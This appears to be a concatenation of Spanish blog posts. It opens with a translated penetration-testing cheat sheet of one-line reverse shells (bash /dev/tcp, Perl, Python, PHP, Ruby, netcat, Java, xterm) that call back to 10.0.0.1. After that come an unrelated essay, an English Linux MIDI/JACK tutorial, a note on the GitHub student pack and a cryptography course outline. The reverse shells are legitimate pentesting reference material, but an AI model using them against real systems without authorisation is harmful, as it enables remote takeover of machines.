Si tenés la suerte de encontrar una vulnerabilidad de ejecución de comandos durante un test de penetración probablemente quieras usar una consola interactiva.

Si no es posible añadir una nueva cuenta, clave SSH o fichero .rhosts y directamente loguearse, el siguiente paso será lanzar una shell reversa o dejar una shell escuchando en un puerto. En este post se verá el primer caso.

Las opciones para crear una shell reversa están limitadas por los lenguajes de scripting instalados en la máquina de la víctima (aunque tambien se podría subir un binario si uno está bien preparado).

Los ejempos a continuación funcionan para sistemas Unix-like. Algunos podrían funcionar también en Windows si se usa «cmd.exe» en vez de «/bin/sh -i».

Cada uno de los métodos siguientes están pensados para ser de una línea para que se puedan copiar fácil, por lo tanto no son muy legibles.

Bash

Algunas versiones de bash pueden usarse como shell reversa (probado en Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL

Esta es una versión más corta y minimalista de perl-reverse-shell:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

También existe una alternativa en PERL en este enlace.

Python

Probado en  GNU/Linux con Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

El código asume que estás usando el descriptor de ficheros número 3. Esto funcionó en mi sistema. Si no lo hace en el tuyo probá con los descriptores 4,5,6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Si querés un fichero .php para subir podés usar php-reverse-shell que es más poderoso y robusto.

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat no suele estar presente en sistemas en producción y aún si lo hace hay que tener en cuenta que algunas versiones no soportan la opción -e.

nc -e /bin/sh 10.0.0.1 1234

Si tenés la versión incorrecta de netcat, Jeff Price points muestra en este enlace que también es posible conseguir una shell de esta forma:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

[Envío anónimo sin probar]

xterm

Una de las maneras más sencillas de obtener una shell reversa es vía una sesión de xterm. El comando a continuación se debe correr en la víctima. Este tratará de conectarse a tu máquina (10.0.0.1 en el puerto 6001).

xterm -display 10.0.0.1:1

Para obtener la shell en tu máquina necesitás iniciar un servidor X que escuche en el puerto 6001. Una de las formas de hacer esto es usando Xnest:

Xnest :1

Necesitarás autorizar a la víctima para que se conecte a tu equipo (también tiene que hacerse en este último):

xhost +targetip

Otras lecturas

Podés chequear Bernardo’s Reverse Shell One-Liners.  Tiene shells hechas de otra manera y la que hizo en ruby no usa /bin/sh para funcionar.

También existe una shell reversa escrita en gawk,  que viene instalado por defecto en muchas máquinas por lo que lo convierte en una excelente herramienta para pentesters.

Sucede que una cosa es encarar con una solución hacia un objetivo determinado… y otra es no tener un objetivo determinado. No por ignorancia -o tal vez sí-sino por falta de intención (!) Me canso de ver gente que no sabe lo que quiere. Pero no se detiene sólo en un objetivo general de vida, sino incluso en cuestiones particulares. Al no saber qué es lo que uno quiere, no puede expresarse correctamente para conseguirlo. Increíblemente saqué esta conclusión luego de que un señor hiciese una «pregunta» a un orador en conferencia y nadie entendió lo que había preguntado por que no había sido claro. Pero no ‘claro’ en el sentido de la pregunta en sí, sino en saber qué estaba buscando.
A ver, es obvio que errores cometemos todos y a lo mejor fue sólo una circunstancia aquella oportunidad, pero es (o sería) gravísimo en términos generales si se amplifica a la vida diaria. Por supuesto que está bueno tener dudas respecto a la vida -cuándo no- pero esto vino directamente de un señor entrado en años e inmediatamente preguntarme: «Si no pudo expresar bien una mísera pregunta, ¿qué queda para sus palabras o sus intenciones?».

Por eso rompo tanto las pelotas con conocerse a uno mismo. Mientras más cerca esté uno de su yo -tarea nada sencilla, por cierto- más cerca estará de conocer sus intenciones, saber cómo se piensa, auto-corregirse como humano, como persona, y poder darle una mano al mundo. Sino, ¿qué nos queda?

Fuente: http://ssaynomore.blogspot.com.ar/2014/06/no-se-que-quiero-pero-se-lo-que-no.html

Saludos!

Linux is a great OS for MIDI. The problem is that you’ve got to understand a lot about Linux to get started. This guide is intended to help ease the transition. This document has been tested with Ubuntu 14.10.

This is a very command-line-intensive tutorial. The reason for this is that it reduces the amount of software that is running which has two advantages: performance and reliability. The GUI can introduce new bugs, so it’s more reliable to work with the command line tools. We will get to the GUI stuff near the end.

If you would prefer a faster, more GUI approach, start with the «audio» Group section, then jump to the qjackctl and Qsynth sections, then go back to the Virtual MIDI Keyboard section and read to the end. This should get you going quickly. It’s still a good idea to read the whole thing as there are many helpful troubleshooting tips sprinkled throughout.

«audio» Group

Audio software needs to run at a higher priority and with memory locked so that it doesn’t swap out to the hard disk. To give a user that power, we create an «audio» group, give that group some special privileges, then add the user to that group.

Note: Ubuntu/Debian can set up a properly configured audio group for you when you install jackd2. If you’d like, you can do this before continuing:

sudo apt-get install jackd2

Be sure to say «yes» when it asks if you want to enable realtime process priority:

After jackd2 is installed, you can skip to «Add Users To «audio» Group» below.

Create An «audio» Group

First, let’s check to see if your system already has an audio group:

$ grep audio /etc/group
audio:x:29:pulse

If you see an «audio» line like the one above, then you’ve already got an audio group and you can skip to Group Limits.

If grep didn’t find an audio group, add one with groupadd:

sudo groupadd audio

Group Limits

The limits for the audio group can usually be found in /etc/security/limits.d/audio.conf. Check to see if that file exists on your system. If not, create one. You might need to create the limits.d directory. Use mkdir for that:

sudo mkdir /etc/security/limits.d

Then create the audio.conf file in there. I usually use nano:

sudo nano /etc/security/limits.d/audio.conf

And add the following lines:

@audio   -  rtprio     95
@audio   -  memlock    unlimited
#@audio   -  nice       -19

The rtprio line gives the audio group the ability to elevate real-time priority to 95 (99 is the highest). JACK needs to be able to do this to handle audio in real-time. The memlock line gives the ability to lock any amount of memory. fluidsynth needs to be able to do this to keep the soundfont in memory while it is using it. fluidsynth will issue error messages about not being able to «pin» memory if this isn’t working.

The commented out «nice» line would give the ability to raise nice priority to -19 (-20 is the highest). Since it is commented out (#), it does nothing. I’ve just provided it for reference.

For more info, see the man page for limits.conf(5).

Add Users To «audio» Group

Even if all of the above was already done for you by your distro, the chances are good that you’ll still need to add yourself to the «audio» group. You can check to see if you are already in the «audio» group with the groups command:

$ groups
ted adm cdrom sudo dip plugdev lpadmin sambashare

In this case, we can see that I am not in the audio group yet, so I need to add myself with gpasswd:

sudo gpasswd -a ted audio

You’ll want to use your userid instead of «ted» when you do this.

This change will not take effect immediately. You must logout then log back in again. Use the «groups» command to see if you were successfully added to the audio group.

$ groups
ted adm cdrom sudo audio dip plugdev lpadmin sambashare

ALSA

ALSA, the Advanced Linux Sound Architecture, is the part of the Linux kernel that talks to your sound-related hardware, like sound cards and MIDI interfaces. It is made up of device drivers and other kernel modules that provide useful audio-related functions. Many distros already have all the ALSA-related parts of the kernel built-in, so all you have to do is plug in your hardware and use it.

ALSA Device Names

To uniquely identify each piece of audio hardware on a system, ALSA assigns them unique names. Usually, «hw:0» is the name of your soundcard. The various audio programs assume that they will be working with hw:0, but they all provide ways to change this.

You can run into trouble if your soundcard isn’t where you think it should be. So, we need to figure out what audio device names have been assigned to which devices. There are two ways to do this. First we can check /proc/asound/cards:

$ cat /proc/asound/cards
 0 [Interface      ]: USB-Audio - USB Uno MIDI Interface
                      M-Audio USB Uno MIDI Interface at usb-0000:00:1d.0-1.2, full speed
 1 [LPK25          ]: USB-Audio - LPK25
                      AKAI professional LLC LPK25 at usb-0000:00:1d.0-1.1, full speed
 2 [Intel          ]: HDA-Intel - HDA Intel
                      HDA Intel at 0xd4400000 irq 45

The numbers to the left indicate the card number. So in this case, number 2 is my soundcard. This means hw:2 is the ALSA device name I need to use. But this doesn’t tell the whole story. There may be multiple devices per card. aplay gets us that information:

$ aplay -l
**** List of PLAYBACK Hardware Devices ****
card 2: Intel [HDA Intel], device 0: ALC270 Analog [ALC270 Analog]
  Subdevices: 0/1
  Subdevice #0: subdevice #0
card 2: Intel [HDA Intel], device 3: HDMI 0 [HDMI 0]
  Subdevices: 1/1
  Subdevice #0: subdevice #0

From this, we can see that I have two sound devices on my system. The first is card 2, device 0, or «hw:2,0». That is a standard sound device that is connected to my speakers and headphone jack. The second is card 2, device 3, or «hw:2,3». That is the sound device that drives my HDMI port.

Note that there is also a subdevice level. It appears that the general form is hw:card,device,subdevice. If you leave subdevice or device off, it assumes 0.

Hopefully «hw:0» is all you need to know after looking at your device lists. If not, then be sure to jot down the appropriate device name that you discovered, and use it where you see «hw:0» for the rest of this tutorial.

Testing ALSA Audio

Use aplay to test ALSA audio. aplay is a simple audio player that can play WAV files. You can use sox to generate a simple WAV file and then play it with aplay:

sox -b 16 -n test.wav rate 44100 channels 2 synth 1 sine 440
aplay -D hw:0 test.wav

The one tricky thing about aplay is that the WAV file format must match the exact format that the device expects. If you get a «Channels count non available» message from aplay, then the format doesn’t match.

pulseaudio

pulseaudio sits on top of ALSA and allows more than one program to access the audio hardware. Many distros have pulseaudio installed by default. Try it. Try listening to an Internet radio station via an online player, then launch your favorite media player (Banshee, Rhythmbox, etc…) and play something. If pulseaudio is running, you’ll hear both. (Oddly, I’ve stopped pulseaudio and I can still hear two programs at once, so this apparently isn’t exactly true. Maybe ALSA can handle mixing audio sources now?)

fluidsynth

fluidsynth is a software synthesizer or «softsynth». It can convert MIDI data into sound by using a «soundfont». On an apt-based distro (Debain, Ubuntu, Mint…), you can do the following to get fluidsynth and a soundfont (fluid-soundfont-gm) installed:

sudo apt-get install fluidsynth

Other distros should have similar packages available. To play a MIDI file called «song.mid»:

fluidsynth –audio-driver=alsa -o audio.alsa.device=hw:0 /usr/share/sounds/sf2/FluidR3_GM.sf2 song.mid

For testing, there are many sites with free midi files to download. Just search on «midi files».

To stop fluidsynth, type «quit» at its «>» prompt. We’ll need to stop fluidsynth for the next section.

aplaymidi

Instead of having fluidsynth play a MIDI file, we can also have fluidsynth make music from MIDI data that comes from other programs. To test this, we’ll use the program aplaymidi which is part of the «alsa-utils» package. In apt-based distros:

sudo apt-get install alsa-utils

Now we’ll run fluidsynth as a server. This means that it will run and wait for other programs to connect to it and send it MIDI data.

fluidsynth –server –audio-driver=alsa -o audio.alsa.device=hw:0 /usr/share/sounds/sf2/FluidR3_GM.sf2

You’ll want to leave that running and bring up another terminal window. There you can use aplaymidi to find out what port number fluidsynth is waiting on:

aplaymidi -l

Here’s what mine shows:

 Port    Client name                      Port name
 14:0    Midi Through                     Midi Through Port-0
128:0    FLUID Synth (2825)               Synth input port (2825:0)

Note that fluidsynth is on port 128:0. We’ll need to use that to let aplaymidi know where to send MIDI data:

aplaymidi -p 128:0 song.mid

To stop fluidsynth, type «quit» at its «>» prompt. We’ll need to stop fluidsynth for the next section.

JACK

Up to this point, we’ve seen how to do audio work with the ALSA drivers directly. However, for serious work, JACK is a better choice since it offers low-latency and the ability to synchronize multiple audio sources. You can think of JACK as an improved pulseaudio. JACK is (as the marketing types might say) «designed to meet the demanding needs of audio professionals.»

Before we get started with JACK, be sure to close any audio applications you’ve been using.

There are two versions of JACK: JACK1 and JACK2. These are interchangeable. I’ve had better luck in the past with JACK2, so I tend to use it. If you didn’t already install JACK2 back in the «Audio Group» section, install it now.

sudo apt-get install jackd2

To run the JACK Daemon (jackd):

jackd -d alsa –device hw:0 –rate 44100 –period 128

The defaults for JACK are –rate 48000 and –period 1024. FluidSynth uses a sample rate of 44100, so going with 44100 reduces the amount of work that needs to be done. Setting the period to 128 frames (3msec) reduces latency to something much more suitable for music-making. The default value of 1024 is 23.2 milliseconds, which is a very noticeable delay.

JACK Troubleshooting

If you give JACK the wrong ALSA device name, you will get an «ALSA: Cannot open PCM device alsa_pcm for playback. Falling back to capture-only mode» error from JACK. See the section above on «ALSA Device Names» for more.

If you get an error message like:

Failed to acquire device name : Audio0 
error : Method "RequestRelease" with signature "i" on interface "org.freedesktop.ReserveDevice1" doesn't exist

Audio device hw:0 cannot be acquired...
Cannot initialize driver

…then JACK and pulseaudio are having a bit of a disagreement over who should get the soundcard. See «Killing pulseaudio» below for information on how to stop pulseaudio.

Testing JACK Audio

We can use jack.play to make sure JACK audio is working. It’s part of the jack-tools package in Debian-based distros:

sudo apt-get install jack-tools

We’ll use sox to create a WAV file for testing.

sox -b 16 -n test.wav rate 44100 channels 2 synth 1 sine 440

Next, we need to tell jack.play what JACK port to connect to. This is done via the JACK_PLAY_CONNECT_TO environment variable.

export JACK_PLAY_CONNECT_TO=system:playback_%d

The «%d» is expanded to the channel number while connecting. So, with a stereo WAV file and the above value, jack.play will connect to system:playback_1 and system:playback_2.

Finally, we can test JACK with jack.play:

jack.play test.wav

FluidSynth and JACK

To run fluidsynth with JACK, bring up another terminal, and:

fluidsynth –server –audio-driver=jack –connect-jack-outputs /usr/share/sounds/sf2/FluidR3_GM.sf2

And finally, to test, bring up another terminal and use aplaymidi to send a MIDI file to fluidsynth’s port. Be sure to check which port fluidsynth is on, as it can change. See the aplaymidi section above.

To bring everything down, first stop fluidsynth by entering the «quit» command at fluidsynth’s «>» prompt. Then switch to the terminal that is running JACK and hit Ctrl-C. Worst-case, you can use killall to stop JACK:

killall jackd

Important Note! JACK takes over the soundcard on your computer. This means that your usual audio and video players will be broken while JACK is running. This includes rhythmbox, amarok, vlc, Adobe flash, etc…. I oftentimes find myself wondering why youtube videos aren’t working. Then I remember that I left JACK running. So, if your normal audio and video players aren’t working, try «killall jackd».

.jackdrc

Since most Linux music-making applications depend on JACK, and JACK’s defaults are not suitable for music-making, we need to set up a .jackdrc file. The .jackdrc file lives in your home directory and it contains the command line that programs should use to start JACK if it isn’t already running. Here’s what mine contains:

/usr/bin/jackd -d alsa –device hw:0 –rate 44100 –period 128

The only difference between this and what we did at the command line is the full pathname to jackd, /usr/bin/jackd. Make sure you set up a .jackdrc file before continuing.

Note: qjackctl (the JACK GUI) will clobber your .jackdrc file without warning. If you find .jackdrc useful, you should keep a backup of it and avoid qjackctl.

Audio Script

We can pull all of the above together into a script for starting JACK and FluidSynth:

#!/bin/bash

# Script to launch audio servers for music-making.

case $1 in

  start )
    # Start JACK
    # As of Ubuntu 12.10, a period of 128 is needed for good fluidsynth
    # timing.  (jackd 1.9.9, fluidsynth 1.1.5)
    jackd -d alsa --device hw:0 --rate 44100 --period 128 \
        &>/tmp/jackd.out &

    # Start fluidsynth
    fluidsynth --server --no-shell --audio-driver=jack \
        --connect-jack-outputs --reverb=0 --chorus=0 --gain=0.8  \
        /usr/share/sounds/sf2/FluidR3_GM.sf2 \
        &>/tmp/fluidsynth.out &

    sleep 1

    if pgrep jackd && pgrep fluidsynth
    then
      echo Audio servers running.
    else
      echo There was a problem starting the audio servers.
    fi

    ;;

  stop )
    killall fluidsynth
    killall jackd
    echo Audio servers stopped.
    ;;

  * )
    echo Please specify start or stop...
    ;;
esac

I call it «audio» and keep it in ~/bin. To use it, just tell it whether you want to start or stop the audio servers:

audio start
audio stop

It’s not perfect (piping the output to a fixed name in /tmp is never a good idea), but it’s a start. Feel free to make improvements and send them to me. It is licensed under the GPLv3+.

At this point, we are ready to start looking at music-making software. If you would prefer to see how starting JACK and FluidSynth can be done with a GUI, jump down to the qjackctl and qsynth sections.

Make sure you’ve got JACK and FluidSynth running before continuing.

A Virtual MIDI Keyboard

In case you don’t have a physical MIDI keyboard, you can use a virtual one. For this tutorial, we’ll use vmpk, the Virtual MIDI Piano Keyboard. To install and run:

sudo apt-get install vmpk
vmpk &

It’s not going to work until we connect it to fluidsynth. We’ll use the «aconnect» command to do that. First, we need to check which MIDI ports fluidsynth and vmpk are on. Note that the options for aconnect are backwards from what you might expect. The «-i» option displays the output ports, while the «-o» option displays the input ports. This is from the point of view of aconnect rather than the point of view of the devices themselves. So, let’s try «aconnect -i» to see the MIDI «output» ports (those that aconnect can «input» from):

$ aconnect -i
client 0: 'System' [type=kernel]
    0 'Timer           '
    1 'Announce        '
client 14: 'Midi Through' [type=kernel]
    0 'Midi Through Port-0'
client 129: 'VMPK Output' [type=user]
    0 'VMPK Output     '

From this we can see that «VMPK Output» is on port 129:0. Note that the «0» on the ‘VMPK Output’ line is the 0 after the colon. Next we use «aconnect -o» to make sure fluidsynth is where it usually is:

$ aconnect -o
client 14: 'Midi Through' [type=kernel]
    0 'Midi Through Port-0'
client 128: 'FLUID Synth (3206)' [type=user]
    0 'Synth input port (3206:0)'
client 130: 'VMPK Input' [type=user]
    0 'VMPK Input      '

Sure enough, fluidsynth is at 128:0. Now to connect the two together:

aconnect 129:0 128:0

And you should hear piano when you play the keys on vmpk. If not, try changing the instrument in the «Program:» field. Sometimes fluidsynth needs a reminder of what instrument to play.

Patchage

If you prefer something a little more graphical when connecting MIDI devices, try Patchage:

sudo apt-get install patchage
patchage &

Patchage shows your MIDI devices as boxes. You can make connections by clicking on the colored connectors (with white text) at either end. You can also break connections the same way.

Note that Patchage launches JACK if it isn’t already running. Make sure you’ve got a proper .jackdrc file in your home directory or JACK will be launched with defaults. See the .jackdrc section above. If you’re avoiding JACK for testing reasons, you’ll need to use aconnect instead of Patchage. You can also disconnect Patchage from JACK by using Patchage’s System menu.

A Hardware MIDI Controller

There are several MIDI controllers on the market that connect via USB. I have the (adorable) Akai LPK25. When I plug it in and take a look at my MIDI devices, I see the following:

$ aconnect -i
client 0: 'System' [type=kernel]
    0 'Timer           '
    1 'Announce        '
client 14: 'Midi Through' [type=kernel]
    0 'Midi Through Port-0'
client 20: 'LPK25' [type=kernel]
    0 'LPK25 MIDI 1    '

So 20:0 is the LPK25. I can connect it to fluidsynth (which happens to be at 129:0 for me right now) using Patchage or aconnect:

aconnect 20:0 129:0

MIDI Troubleshooting Tip: The dmesg and lsusb commands can be helpful when diagnosing hardware problems. When I plug in the LPK25, I see this at the end of dmesg:

[54428.182449] usb 2-1.1: new full-speed USB device number 6 using ehci-pci
[54428.268927] usb 2-1.1: New USB device found, idVendor=09e8, idProduct=0076
[54428.268936] usb 2-1.1: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[54428.268942] usb 2-1.1: Product: LPK25
[54428.268948] usb 2-1.1: Manufacturer: AKAI professional LLC

Then lsusb shows me that it is connected:

Bus 002 Device 006: ID 09e8:0076 AKAI Professional M.I. Corp. LPK25 MIDI Keyboard

A Hardware MIDI Interface

If you want to connect external MIDI devices like keyboards with MIDI ports, you’ll need a hardware MIDI interface like the M-Audio Uno MIDI Interface. When I plug mine in, I get the following new port:

client 20: 'USB Uno MIDI Interface' [type=kernel]
    0 'USB Uno MIDI Interface MIDI 1'

Once you’ve got the port showing up, you can connect a keyboard or other MIDI device to the interface and talk to it through that port.

qjackctl

qjackctl provides a GUI for JACK. To install and run:

sudo apt-get install qjackctl
qjackctl &

You’ll need to configure JACK through qjackctl before using it. Press the «Setup…» button to get the Setup dialog. Many of the settings will be set to «(default)» and that should be ok. Just make sure «Frames/Period» is set to 128, and «Sample Rate» is set to 44100. Also, if you need to use an ALSA device name other than hw:0, check the «Output Device» field. See the ALSA Device Names section above for details.

Click Ok to close the Setup dialog and press the «Start» button to start JACK.

One annoying thing about qjackctl is that it will overwrite your .jackdrc file without your permission. Bear this in mind in case things aren’t working as expected.

Qsynth

Qsynth provides a GUI for FluidSynth. To install and run:

sudo apt-get install qsynth
sudo apt-get install fluid-soundfont-gm
qsynth &

Next you’ll need to load the soundfont. Press the «Setup…» button and switch to the «Soundfonts» tab. Click on the Open… button and open the soundfont that we’ve been using with the command line.

Now test with aplaymidi as usual:

aplaymidi -p 128:0 song.mid

See the aplaymidi section above for details.

Qsynth Troubleshooting

Qsynth will launch JACK using the .jackdrc file if JACK isn’t running. Make sure your .jackdrc file is set up properly. See the .jackdrc section above.

Press the Messages button to see the startup messages for JACK and Qsynth.

If Qsynth isn’t working, try using ALSA instead of JACK. Launch Qsynth, change the Setup… > Audio tab to use ALSA for the audio driver. Close Qsynth. Stop JACK. Then restart Qsynth. Now pipe something in with aplaymidi. Switch the configuration back to JACK when you’re done testing.

If it appears that JACK isn’t working properly, you might need to make sure JACK is talking to the correct audio device. Sometimes it gets confused and tries to send audio to a MIDI interface. See the ALSA Device Names section above.

MIDI Sequencers

Once you’ve figured out how to get all your MIDI hardware and softsynths set up, you can install and use a MIDI sequencer for serious music composition work. Two of the best are Rosegarden and Hydrogen.

Rosegarden

Rosegarden is a MIDI sequencer that offers multi-track recording and playback along with notation editing.

Rosegarden does require a little configuration to get it working. Sometimes it picks things up automagically, but other times you’ll need to go to Studio > Manage MIDI Devices… in the menu and there you will be able to connect Rosegarden to your soft synths, keyboards, and other MIDI devices. Here’s a screenshot of Rosegarden set up for fluidsynth and my Akai LPK25:

Hydrogen

Hydrogen is a drum sequencer. It has its own softsynth built in, so it comes up ready to go.

Audio Software

Audacity – Sound editor. Also does multi-track recording.

Ardour – Digital audio workstation.

Low-latency Kernel

I went through the above tutorial with the standard Ubuntu kernel which is not a low-latency kernel, and Patchage reported dropouts whenever I moved or resized a window. That’s not good. With a Low-Latency Kernel, the dropouts went away. If you are serious about working with audio in Linux, you really need to use a low-latency kernel with the timer frequency set to 1000Hz. There are three main ways to do this.

Distro Package

The first way would be to see if your distro already has a low-latency kernel available and install it. Ubuntu has a «linux-lowlatency» package you can install:

sudo apt-get install linux-lowlatency

After that installs, reboot and use uname to make sure it is running:

$ uname -a
Linux ted-laptop 3.13.0-24-lowlatency #47-Ubuntu SMP PREEMPT Fri May 2 23:59:20 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

The keyword «PREEMPT» tells us this is a low-latency kernel.

If it isn’t running, reboot and hold down the left shift key when the system is coming back up. This should give you the GRUB menu where you can select a specific kernel.

Once the linux-lowlatency kernel is running, you should be able to uninstall the linux-generic kernel to avoid accidentally booting into it. Proceed carefully. I have no experience with this.

Multimedia Distro

The second way would be to use a multimedia distro like Ubuntu Studio. These sorts of distros install a low-latency kernel by default.

Build Your Own Kernel

And finally, if you don’t mind building the kernel, you can adjust the configuration to get a low-latency kernel. In the category «Processor type and features,» you’ll find two key settings. The first is «Preemption Model» which should be set to «Preemptible Kernel (Low-Latency Desktop)». The second is «Timer frequency» which should be set to 1000Hz for decent audio performance.

My steps for building my own kernel are in my Linux Kernel Build HOWTO.

Killing pulseaudio

Unfortunately, pulseaudio can interfere with JACK, and it’s really hard to kill pulseaudio. It tends to keep respawning itself. If you find you are having problems with JACK and pulseaudio getting along, you can try killing pulseaudio. However, this will break some things that you might be used to, like the volume control on your desktop.

To stop pulseaudio, edit /etc/pulse/client.conf and set autospawn to no:

autospawn = no

After a reboot, pulseaudio will not come up unless you ask for it manually:

pulseaudio --start

Without pulseaudio, some things will not work. I noticed that I can still have more than one app generating sound and I hear both. However, the Ubuntu volume control is broken and I have to use alsamixer to adjust volume. It’s a bit irritating. It might be worth looking for a fix for this.

For more info, check out these pulseaudio man pages: pactl(1), pasuspender(1), and pulse-client.conf(5). «apropos pulse» gives a rather complete list. Also see Carla Schroder’s tip and JACK’s advice for getting JACK and pulseaudio to coexist.

JACK and Headphones

On my laptop (an HP G62) I noticed that whenever I plugged in my headphones, the speakers would go off, but there would be no sound on the headphones. It turns out that my particular laptop has separate output channels for the speakers and the headphones. If you happen to be unlucky enough to have the same problem, see my JACK and Headphones page for details. Later versions of the Linux kernel fixed this for me.

TODO

• Move Low-Latency Kernel section to the top.
• Add a section on kmidimon. Show how to monitor with a Y-cable in Patchage.
• Test on a clean install and work out any remaining issues

License

Copyright (C) 2011-2014, Ted Felix

Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts. See http://www.gnu.org/licenses/fdl.html for the full text of this license.

Fuente: http://tedfelix.com/linux/linux-midi.html

Saludos!

Ernesto Wait Loprette, un artista de música en espera que busca poner en perspectiva los verdaderos problemas de sus clientes es contratado por numerosas compañías multinacionales, entre las cuales se encuentran Ingress, el sitio de hossting 1&1 o el mismísimo Arch Linux, esta genial distribución de GNU/Linux tan caracterizada por el lucro a sus usuarios.

Saludos!

Algunos de los recursos más interesantes con los que cuenta son un dominio .me con certificado SSL gratis en Namecheap, un crédito de 25 dólares en HackHands para obtener ayuda sobre programación en vivo todo el día, o una cuentra Micro en el mismo GitHub la cual permite a los jóvenes estudiantes introducirse en el fantástico mundo de los repositorios privados usados para desarrollo de software privativo.

Debo reconocer que superó ampliamente mis expectativas el no darle importancia a no que no estudie en una universidad norteamericana que me quite unos cuantos verdesitos anuales. Fue una excelente y no frecuente actitud darle el pack a un alumno de escuela pública latinoamericana. Lo único que requerí fue una cuenta de e-mail de la escuela para estar seguros de mi condición de estudiante, la cual no fue lo más fácil de conseguir pero insistiendo un poco se logró.

Una de las causas que me hizo distanciarme un poco de los recursos ofrecidos fue el preferir mantenerme en la tierra y los subsuelos y mirar con desconfianza lo demás (llámese nube) debido a los problemas de privacidad que ofrece. Las pocas intenciones que tenía de vender un poco mis datos e ideales a cambio de una mejor disponibilidad o capacidad de cómputo se desvanecieron cuando me enteré que algunos servicios no aceptaban tarjetas de crédito leakeadas en el proceso de «autenticación física» que requiere de estas no para cobrarme, sino solamente para tener. Mala idea suponer que tengo semejante aparatito y que en el caso de tenerlo lo usaría para esto.

Para ir cerrando agradezco a la gente GitHub y de todas las empresas  por brindar esta promoción y aconsejo a todos los estudiantes probarlo, pero siempre manteniéndose moderado. No sé si hace falta aclarar que los recién agradecidos no son ningún alma bondadosa sino que su trabajo es especular con la idea de que ya egresados solamente vamos a conocer su empresa y la contrataremos por el resto de nuestras vidas. Todos felices.

Saludos!

Link al pack: https://education.github.com/pack/offers

Posteriormente editamos el~/.bashrc y listo.

Que te diviertas!

Fuente: http://vampii.blogspot.com.ar/2014/08/personalizar-tu-prompt-de-forma-facil-y.html

Saludos!

• Cifrado One-Time-Pad (XOR)
• Pseudo-Random Number Generators, importancia de estar correctamente implementados
• Cifrado simétrico: AES, ventajas y desventajas del cifrado en bloque, modos ECB, CBC, CTR, PTR y CFM
• Funciones de hash, propiedades, uso de las cadenas de hashes
• Protocolo Diffie-Hellman, cualidades de los números primos, la aritmética modular y el logaritmo discreto
• Criptografía asimétrica: ventajas, posibles usos, funcionamiento de RSA, integración con sistemas de cifrado simétrico
• Protocolos de autenticación: Encryption Key Exchange, Secure Shell, Transport Layer Security, estructura y funcionamiento de los certificados digitales y de entidades certificadoras
• Otras apliacciones de la criptografía: anonimato (TOR), voto electrónico, dinero digital (Bitcoin)
• Secure Computation, Garbled Circuit Protocol
• Entrevista sobre el funcionamiento de GSM y lo fácil que resulta romperlo

Video de presentación:

Link al curso: https://www.udacity.com/course/cs387

Saludos!

A disfrutar de la matemática, criptografía y hacking

Fuente: http://www.caceriadespammers.com.ar/2014/08/predictive-pseudo-random-nubers-generator-in-debian.html
Saludos!